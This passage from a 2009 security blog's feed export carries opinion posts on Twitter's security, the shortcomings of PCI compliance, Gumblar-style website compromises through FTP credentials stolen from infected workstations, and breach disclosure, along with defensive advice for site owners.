scheme='http://www.blogger.com/atom/ns#' term='archive.org'/><title type='text'>A look back on Twitter</title><content type='html'>For the record, I think that an application like Twitter is one that will be mimicked often from here on out. Being a fan of blogging, I have no problem with the idea of a "micro blog" and believe that the concept will be seen for years to come. I also believe that an application like Twitter will be used widely by security professionals not only as a way to tweet or communicate, but as a way to share resources quickly, maybe changing the game from zerosec to zerotweet. I can already picture how superior the crew in the movie Hackers would have been with the ability to tweet at each other to pool resources and communicate. There would simply have been no need for a movie, they would have been so leet. It would have at least spared all of us from a sequel.&lt;br /&gt;&lt;br /&gt;With all of the articles that are being posted on Twitter, it is no secret that they have been plagued with one security issue after another. I myself was able to jump on Twitter about three weeks ago and, within a couple of minutes, find some severe security related issues that will need attention from the busy Twitter staff. Aviv Raff posted today that he is going to blog on "&lt;a href="http://aviv.raffon.net/2009/06/15/MonthOfTwitterBugs.aspx"&gt;July: Month of Twitter Bugs&lt;/a&gt;", which I will try to follow closely because I not only want to see what he digs up, but am also confident that it will spark a lot more issues from other security professionals regarding Twitter and its lack of security.&lt;br /&gt;&lt;br /&gt;With my post today, I wanted to bring a little bit of historical data to the story of Twitter, as there are just some things that do not make a lot of sense to me when I go back and look at the details. 
One of the common tools that I use often when assessing the overall security of a website is &lt;a href="http://www.archive.org/"&gt;www.archive.org&lt;/a&gt;. Going back and reviewing archived pages of a website can be useful in so many different ways, but to me Twitter has a lot more to reveal.&lt;br /&gt;Besides the observation that Twitter.com has most likely been plagued with security issues since day one, the first thing that I noticed was "Wow, Twitter has sure been around a long time; why has it seen an enormous amount of growth only recently?" Stats on &lt;a href="http://siteanalytics.compete.com/twitter.com/"&gt;Compete.com&lt;/a&gt; show that Twitter is really a product of 2009 (this can be argued, but the stats do show convincing evidence), and to be sitting there basically idle for so many years is just crazy to me. It really makes you feel that Twitter was not ready for the super boom and that it came somewhat out of the blue. Now I know that there are a lot of factors that play into Twitter's recent popularity, including the recent boom in web-enabled mobile phones, but I would attribute the major cause of the spike in Twitter's popularity to its marketing and the public craze, the feeling that if you are not on Twitter, then you are not up on the newest social playground. I see this type of marketing as the future trend in social networking sites: jumping from one popular service to another, leaving the previous site dried up like a ghost town.&lt;br /&gt;&lt;br /&gt;The question that has been &lt;a href="http://www.urbandictionary.com/define.php?term=mind%20bottling"&gt;mind bottling&lt;/a&gt; to me is: when does a company like Twitter take a step back and identify that security needs to be a very large aspect of their product? 
You would assume that increasing in popularity by some million-fold percentage would do it, or their increase in budget (I am only assuming they have a larger budget these days; if they don't, there is a larger issue than security going on). Is it possibly going to take the month of July and all of its bug releases and blogging to have them go into overdrive with security?&lt;br /&gt;&lt;br /&gt;One of the largest realizations that I made when I first came into web application security was that, large or small, every company or website can be plagued with issues, and not to trust a large website just because it is large and everyone else is using it. Twitter can really reinforce this observation and hopefully will bring some light into people's eyes. But then again, does it stop the public from tweeting?&lt;br /&gt;&lt;br /&gt;I can honestly say that, by following other professionals or groups, Twitter has had a positive influence on me in the world of security. Maybe their developers should add a few more Twits to follow, like the entire group &lt;a href="http://twitter.com/securitytwits"&gt;SecurityTwits&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-7997648252510977710?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/7997648252510977710/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=7997648252510977710' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7997648252510977710'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7997648252510977710'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/look-back-on-twitter.html' title='A look back on Twitter'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-7337343425255849117</id><published>2009-06-08T10:21:00.000-07:00</published><updated>2009-06-08T11:26:04.575-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PCI Compliance'/><category scheme='http://www.blogger.com/atom/ns#' term='PCI approved payment application'/><category scheme='http://www.blogger.com/atom/ns#' term='success of PCI'/><category scheme='http://www.blogger.com/atom/ns#' term='Secure shopping cart'/><title type='text'>A must (IMO) for PCI to be successful.</title><content type='html'>This post might be a duplicate post for me, but every day that I work with the PCI standard I am more convinced that something needs to change, so I want to touch back on it.&lt;br /&gt;PCI is honestly my favorite standard in the progression of web application security out right now. Not because I believe that it is making an impact, but because I feel that it gives me the leverage as a consultant to force customers to secure their website.&lt;br /&gt;&lt;br /&gt;One of the largest issues that I believe to be contained in the PCI compliance standard is the balance between identifying whether a website or payment application is secure and the ease of use/compliance for the customer. 
I honestly feel that the requirements for PCI compliance are fairly minimal in verifying actual security.&lt;br /&gt;Now, working at McAfee Secure, I should be the first one to recognize that in order to have a successful standard or product, you must also make sure that your standard is obtainable. If you create a standard that is out of reach for most customers, then you will clearly have issues with generating a following that is not only able to satisfy the necessary conditions, but willing to support the standard itself. The issue with this is that you will soon find that you might have to make decisions about your product or standard that might not be in its best interest from a security standpoint, in order to accommodate the customer in being able to satisfy the conditions to meet the standard.&lt;br /&gt;Now, ask every security professional out there and they will most likely tell you the exact same answer: "There should absolutely be no accommodations or settling when it comes down to security." Based on this answer, I must say that if PCI is going to be successful, they must find a way to properly verify that the payment application or website is secure, while still making the standard an obtainable one.&lt;br /&gt;&lt;br /&gt;I touched a little bit on this before in a previous post, "&lt;a href="http://blog.igothacked.com/2009/04/who-takes-pci-seriously.html"&gt;who takes pci seriously&lt;/a&gt;", but I honestly believe that the only way that this standard is going to have a chance at being successful is to take the customization out of the customers' hands. What do I mean by this?&lt;br /&gt;&lt;br /&gt;Every e-commerce site on the internet that takes credit card information must have some type of payment application or shopping cart. In working with customers who come to us or end up compromised, you start to notice certain common patterns. 
One of these common patterns that I have been able to establish is that a customer is way, way, way more prone to their site being compromised if they use their own custom payment application or shopping cart.&lt;br /&gt;&lt;br /&gt;Chances are, with most custom payment applications or shopping carts, the application or shopping cart itself was not coded with any type of secure coding best practices, and is most likely insecure in one way or another. THIS WILL NEVER STOP. You are always going to have websites that would like a shopping cart custom tailored to their product, and they are not going to shell out the money to make sure that their custom app is coded correctly. This happens every day and, for the most part, will never cease.&lt;br /&gt;&lt;br /&gt;What does PCI need to do to head this issue off at the pass?&lt;br /&gt;This type of programming will never quit, and if PCI wants to do anything about it, they need to act sooner rather than later. I believe that the payment application or shopping cart must be checked against the highest standards for security, and there must not be any accommodations in verification. One way to do this, I believe, is to make it a part of PCI's standard that all payment applications must either be approved by the PCI council by going through some type of high-level certification (&lt;a href="http://usa.visa.com/download/merchants/validated_payment_applications.pdf"&gt;VISA's list of validated payment applications&lt;/a&gt;) or the application or shopping cart must be subject to a Level 1 audit.&lt;br /&gt;&lt;br /&gt;What this will accomplish.&lt;br /&gt;This should help eliminate all of the horribly coded shopping carts out there that look like they are a part of Foundstone's Hacme series, containing literally every web application vulnerability that has been in current use for the last decade. 
Website owners will not just be able to hire the local web developer with 3 months of development experience to create a very sophisticated shopping cart. There are so many approved shopping carts out there that I feel at least one of them would be able to accomplish the task and be customizable enough for the customer. If it is not, they obviously have a product that is unique and should have the funding to create a custom shopping cart and send it through the certification process.&lt;br /&gt;&lt;br /&gt;In my opinion, this is a must. This, to me, is the only way to help verify that a payment application is secure and was written with coding best practices and security guidelines. This is also one of the only methods that I see fit that, after an initial fight, could be adopted by anyone who is storing, processing, or transacting credit card information. Obviously an adjustment this large to a standard would need a grace period, but by some time before, let's say, the end of the world in 2012, a standard like this should be able to be adopted and carried out.&lt;br /&gt;&lt;br /&gt;I am really interested in identifying either a better solution for improving the PCI standard or the faults in this type of modification. Any opinions would be greatly appreciated. 
I feel that PCI has made a huge start in helping to secure e-commerce online, but it is still very far from accomplishing its task.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-7337343425255849117?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/7337343425255849117/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=7337343425255849117' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7337343425255849117'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7337343425255849117'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/must-imo-for-pci-to-be-successful.html' title='A must (IMO) for PCI to be successful.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-5260884432532277619</id><published>2009-06-08T09:55:00.000-07:00</published><updated>2009-06-15T16:13:12.367-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='being a security professional'/><category scheme='http://www.blogger.com/atom/ns#' term='blog conduct'/><category scheme='http://www.blogger.com/atom/ns#' term='james a lester'/><title type='text'>An update to updating.</title><content type='html'>One of the things that I keep telling 
myself that I am going to accomplish is to update this blog more frequently. It is not that I am picking up people who actually read this thing, but I would like to document more often the trends and issues that I am currently experiencing at my employment. The obstacle that I have been facing since day one is to publish to a blog while never attempting to speak negatively about another security professional or company. I have no problem trying to identify an issue within a specific security practice, protocol or organization, but I will not use this blog to promote myself by slandering another "professional" or the actual product of a specific company.&lt;br /&gt;The reason for this is that I am still what I consider a young individual in this field. There is no way that I am going to cut off or eliminate opportunities to meet, discuss, or debate with security related professionals or issues.&lt;br /&gt;So, with that being said, I am going to try to update this blog more often. I will try to stick with my ultimate goal here and properly document experiences, trends, and issues that I have been facing during my current employment. 
Although I find it very difficult to hold my tongue every once in a while because someone out there is being absolutely stupid from a security standpoint, I will try my best to focus directly on the issue itself from the security point of view and try not to include the individual or the company's product.&lt;br /&gt;&lt;br /&gt;I feel that this is a vital aspect of being a security professional, and slandering an individual or company is something that I will leave to the 12-year-old hackers.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-5260884432532277619?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/5260884432532277619/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=5260884432532277619' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5260884432532277619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5260884432532277619'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/update-to-updating.html' title='An update to updating.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-2713082574603350233</id><published>2009-05-18T13:57:00.001-07:00</published><updated>2009-06-02T11:04:54.957-07:00</updated><category 
scheme='http://www.blogger.com/atom/ns#' term='FTP hacked'/><category scheme='http://www.blogger.com/atom/ns#' term='Gumblar'/><category scheme='http://www.blogger.com/atom/ns#' term='redirect hack'/><category scheme='http://www.blogger.com/atom/ns#' term='Google hack'/><title type='text'>How to compromise a secure website. (Gumblar)</title><content type='html'>After watching the recent trend of Gumblar and its method of exploitation, you really have to ask yourself, "How the hell do you protect your customers from this?" Yes, their server is compromised, but did it occur from a web application vulnerability? Chances are the answer is "No". The majority of cases that I have seen from this recent trend were all exploited by obtaining the FTP user credentials of a webmaster through their compromised, malware-loaded workstation.&lt;br /&gt;&lt;br /&gt;Now, sitting back and thinking about this method of attack, you can really identify a lot of benefits to this type of exploitation.&lt;br /&gt;&lt;br /&gt;1. You could technically compromise a completely secure web application and server. (Yeah, I know, I am being loose with the term "secure web application" here.)&lt;br /&gt;2. For the most part, even if you remove the malicious links, you still need to track down the workstation that is compromised, which otherwise leaves a high probability of future compromise.&lt;br /&gt;3. Once the infected workstation is detected, can you really do anything to secure it from this type of attack occurring again?&lt;br /&gt;4. How long are these malicious URLs up on the website before a trend is found and is flagged in an application such as Google Safe Browsing?&lt;br /&gt;&lt;br /&gt;Sitting back and thinking about this, it is now a little easier for me to understand why an attacker with full FTP credentials to a website would only go as far as placing a small malicious link on their victim's pages. 
There is no complete defacement and no attempt to discover sensitive information on the webserver. From this you can easily discover the motivation for this type of attack: MONEY!&lt;br /&gt;&lt;br /&gt;I will just link to my last post, which contains best practices to assist with prevention and increase security: &lt;a href="http://blog.igothacked.com/2009/05/botnets-spreading-thier-love-to.html"&gt;Here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-2713082574603350233?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/2713082574603350233/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=2713082574603350233' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2713082574603350233'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2713082574603350233'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/05/how-to-compromise-secure-website.html' title='How to compromise a secure website. 
(Gumblar)'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-3277028697353927146</id><published>2009-05-14T11:13:00.000-07:00</published><updated>2009-06-08T13:00:45.015-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='embedded url'/><category scheme='http://www.blogger.com/atom/ns#' term='FTP breach'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='FTP credentials'/><category scheme='http://www.blogger.com/atom/ns#' term='Gumblar'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><category scheme='http://www.blogger.com/atom/ns#' term='malicious link'/><title type='text'>Botnets spreading their love to webservers,  via obtaining FTP Credentials from a malware infected workstation.</title><content type='html'>A nice little trend has been popping up and is becoming way more than a mere coincidence. Lately, a couple of customers have been calling up stating that their website has been compromised. The trend is usually the same: the good ol' malicious link has been embedded into multiple pages on their website. This trend has been very common with automated SQL injection attacks, but lately SQL injection has not been the culprit. After conducting an investigation, I have been identifying that the issue has been the result of an FTP breach. 
Now, I have seen this method of breach occur in the past with the .htaccess file being modified (see previous &lt;a href="http://blog.igothacked.com/2009/01/update-on-google-302-redirect-exploit.html"&gt;post&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;When an FTP breach occurs, you usually start running the customer through the traditional questions: Do you use strong passwords? Do you change your password regularly? How many users share the login/password in question? Is your FTP application up to date with the latest security related patches? All of these have been coming back with answers that tend to rule out a possible exploit.&lt;br /&gt;&lt;br /&gt;Now, I find that there are a lot of interesting things here, so I will try to remember all of the ones off the top of my head.&lt;br /&gt;&lt;br /&gt;So far, I have seen 3 possible methods of exploitation.&lt;br /&gt;1. The user's FTP credentials are being compromised through malware installed on the client's workstation.&lt;br /&gt;2. The FTP user credentials can be sniffed via plain-text authentication.&lt;br /&gt;3. The user is using weak FTP passwords, which can be brute-forced (although I do not see any brute forcing in the FTP log files, I will still leave it open as a possibility).&lt;br /&gt;&lt;br /&gt;While all of the instances that I have seen look like they have been coming from malware installed on the client's workstation, I am a security analyst and always recommend solutions to cover all bases of possible methods of exploitation.&lt;br /&gt;&lt;br /&gt;So what I find really interesting is that an attacker/hacker has your FTP credentials, and all that they are doing is embedding a link into your website. I do not see any actions of defacement, installing backdoors, or attempting to obtain sensitive information. To me, this is quite odd. These are not hackers who are looking to create a name for themselves or trying to steal CC info out of your database. 
These are hackers who are trying to spread their infection by crawling over the top of the single user and passing their tactics onto your webserver to assist with growth.&lt;br /&gt;&lt;br /&gt;I feel that this trend is very interesting because it further backs up the security professionals' opinion that botnets are evolving and becoming very specific in their objective and method of exploitation.&lt;br /&gt;&lt;br /&gt;I will close out this post with recommendations to the client on what they can do to help secure the issue and assist with identifying the method of exploitation.&lt;br /&gt;&lt;br /&gt;1. Change FTP user credentials often, using strong passwords.&lt;br /&gt;2. Hand out individual FTP credentials to anyone accessing the FTP server. This will assist with identifying where the FTP credentials are being leaked and is just good security practice. You will also want to remove all users who do not need access to the webserver.&lt;br /&gt;3. Use a secure FTP server and client application. This will prevent the FTP authentication from being passed in plain text. Make sure you update your FTP server/client application to the most recent version or patch with all recent security related patches.&lt;br /&gt;4. Run an anti-virus and malware detection tool on all workstations regularly.&lt;br /&gt;5. Review FTP log files regularly, looking for unauthorized authentication.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And the bonus question:&lt;br /&gt;&lt;br /&gt;Why is there not a popular application that exists, or add-on built into an FTP server, cPanel or Plesk, that notifies the client if a file has been added or modified within their account? This would prevent out-of-the-ordinary modifications or new files from going unnoticed. 
And if there is one, why is it not in widespread use?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-3277028697353927146?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/3277028697353927146/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=3277028697353927146' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3277028697353927146'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3277028697353927146'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/05/botnets-spreading-thier-love-to.html' title='Botnets spreading their love to webservers,  via obtaining FTP Credentials from a malware infected workstation.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-7895784712426337413</id><published>2009-04-21T10:49:00.000-07:00</published><updated>2009-04-27T07:27:32.888-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Subcommittee on Emerging Threats'/><category scheme='http://www.blogger.com/atom/ns#' term='Congress'/><category scheme='http://www.blogger.com/atom/ns#' term='cybersecurity'/><category scheme='http://www.blogger.com/atom/ns#' term='Payment Card Industry'/><category 
scheme='http://www.blogger.com/atom/ns#' term='cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='PCI'/><title type='text'>Do the Payment Card Industry Data Standards Reduce Cybercrime?</title><content type='html'>Somebody was asking me where to find this, so I will post a quick link to the already old &lt;a href="http://www.homeland.house.gov/hearings/index.asp?ID=185"&gt;Subcommittee on Emerging Threats, Cybersecurity and Science and Technology&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I wouldn't bother watching it; it does not do justice to a serious issue that really needs to be taken seriously.&lt;br /&gt;&lt;br /&gt;The amount of sensitive information being leaked during the time of this hearing: 1,434,434,334 credit card numbers (not a real number). Keep it up, you're making such great progress.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-7895784712426337413?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/7895784712426337413/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=7895784712426337413' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7895784712426337413'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7895784712426337413'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/04/do-payment-card-industry-data-standards.html' title='Do the Payment Card Industry Data Standards Reduce Cybercrime?'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-6195613557633643035</id><published>2009-04-09T11:02:00.000-07:00</published><updated>2009-04-09T12:03:41.819-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='QSA'/><category scheme='http://www.blogger.com/atom/ns#' term='ASV'/><category scheme='http://www.blogger.com/atom/ns#' term='disclosure'/><category scheme='http://www.blogger.com/atom/ns#' term='compromise'/><category scheme='http://www.blogger.com/atom/ns#' term='PCI standard'/><title type='text'>What happens when a company gets hacked?</title><content type='html'>So what exactly happens when a company's website gets hacked? Is there anything set up that actually tries to identify whether sensitive information has been obtained? Is there anything set up that helps verify that the company has indeed identified the issue and verified that the vector has been secured? I am going to have to say that for the majority of companies out there, the answer is no. What I have seen from personal experience is that the most important aspect of being hacked, as a company, is to get the site back online and do anything necessary to make sure that the trust of the customer has not been lost. 
Currently, the way that things are set up (such as PCI), most companies do not disclose that they have been compromised, because it will have a serious impact on the trust in their site, ultimately ending up with fewer sales.&lt;br /&gt;&lt;br /&gt;There is something seriously wrong with this.&lt;br /&gt;&lt;br /&gt;There is nothing that really mandates that a company disclose any information to the public or their customers, other than individual state laws that have been put in place and that most companies don't even know about. Now, I understand that we will always be faced with this issue: there will always be companies that will do anything necessary to not disclose their compromise, and we will never be able to fully eliminate this.&lt;br /&gt;&lt;br /&gt;What I believe needs to be accomplished is that PCI sets up a requirement or method that ASVs/QSAs must follow if a customer informs them that they have been compromised. There must be a standard set up that an ASV/QSA can follow that mandates the company to disclose the issue. It must also be the ASV/QSA's job to work with the company, to assist with identifying the vector through which the compromise occurred, and to verify that the vector has been secured.&lt;br /&gt;&lt;br /&gt;If a company is required to disclose a compromise no matter what the size or impact may be, they will be a little more proactive in making sure that their website is secure. I understand that a company must worry about the effect of a disclosure, but honestly, they have been compromised, and they should not have a choice. Their customers have the right to know that the site was insecure and that their personal information might have been revealed.&lt;br /&gt;&lt;br /&gt;Also, going in parallel with the fact that they have been compromised is the understanding that their website was indeed insecure, and therefore they should not solely be responsible for mitigating the issue. 
They should be required to have their ASV/QSA assist them with the compromise and verify that they have indeed resolved all issues of insecurity.&lt;br /&gt;&lt;br /&gt;If anyone out there knows the security of a website better than the company itself, I would say that it is their ASV/QSA or the attacker who was able to compromise the site. As an ASV/QSA you are usually able to form an opinion of the company's level of activeness in security by monitoring how long it takes them to fix an issue, or their overall understanding of security. From this information the ASV/QSA will be able to generate a basic opinion of the company's overall determination to be secure. This can be used to assist the company in making sure that they are conducting the right operations to secure the website and are getting it right the first time. At the same time, the ASV/QSA can assist the company in preparing a public statement that tells their customers that they have been compromised. 
This will also verify that the company does not take the compromise lightly or release a public statement that does not accurately describe the level of compromise.&lt;br /&gt;&lt;br /&gt;I want to close by asking if any of you even know that Visa has a document called "What to do if Compromised", and if you have ever heard of a company following the procedure.&lt;br /&gt;&lt;a href="http://usa.visa.com/download/merchants/cisp_what_to_do_if_compromised.pdf"&gt;http://usa.visa.com/download/merchants/cisp_what_to_do_if_compromised.pdf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Also check out:&lt;br /&gt;&lt;a href="https://www.pcisecuritystandards.org/search/searchresults.html?s=hacked"&gt;PCIsecuritystandards.org keyword search for "Hacked"&lt;/a&gt;&lt;br /&gt;&lt;a href="https://www.pcisecuritystandards.org/search/searchresults.html?s=compromised"&gt;PCIsecuritystandards.org keyword search for "Compromised"&lt;/a&gt;&lt;br /&gt;I'll save you the excitement: they return &lt;span style="font-weight: bold;font-size:180%;" &gt;0&lt;/span&gt; results.&lt;br /&gt;&lt;br /&gt;What about these answers from the PCI Council?&lt;br /&gt;&lt;br /&gt;If my business was deemed compliant but my system was still breached and payment account data compromised after the fact, what liability would my business incur?&lt;br /&gt;--&lt;span style=";font-family:'Times New Roman';font-size:9;color:black;"   &gt;&lt;span style=";font-family:Arial;font-size:100%;"  &gt;&lt;span style="color: rgb(255, 0, 0);"&gt;The PCI Security Standards Council is not responsible for levying any financial or operational consequences on businesses that have either been breached or are suspected of an account data compromise. 
These businesses should contact the individual payment brands regarding next steps, such as contacting law enforcement, or obtaining other relevant information, including potential consequences should a compromise have occurred.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;Will the PCI Security Standards Council be involved in performing forensics investigations as a result of an account data compromise event?&lt;br /&gt;--The PCI Security Standards Council will not conduct forensics investigations either directly or through a third party in the event of an account compromise.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-6195613557633643035?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/6195613557633643035/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=6195613557633643035' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/6195613557633643035'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/6195613557633643035'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/04/what-happens-when-company-gets-hacked.html' title='What happens when a company gets hacked?'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-9139772783548772321</id><published>2009-04-02T15:14:00.000-07:00</published><updated>2009-04-21T11:02:42.417-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PCI Compliance'/><category scheme='http://www.blogger.com/atom/ns#' term='Current PCI Issues'/><category scheme='http://www.blogger.com/atom/ns#' term='PCI. ASV'/><title type='text'>Who takes PCI seriously?</title><content type='html'>A good portion of my day consists of consulting for PCI compliance. After consulting with the customer on one issue after another, you really start to realize that the customer is not concerned with security whatsoever. What they are concerned with is getting the banks, or whoever is auditing them, off their back.&lt;br /&gt;Why are the banks on their back? Well, it is most likely not for security either. It is likely because they have identified PCI compliance as another revenue generator, requesting customers to become compliant or pay a fine ($$), knowing that they will be out of compliance for at least some period of time. The banks are also teaming up with ASVs/QSAs, creating a partnership with them to basically split the revenue, stating that if you are not PCI compliant, the bank will provide an ASV/QSA for you. Now, I am not stating that this is a bad thing, because I would like to see companies become PCI compliant by any means necessary. What I am saying is that neither of these cases really has a concern for the actual security of each company.&lt;br /&gt;One of the more difficult issues that I face in dealing with a company that is trying to obtain PCI compliance without a serious concern for security is that they will do just about anything to obtain compliance. 
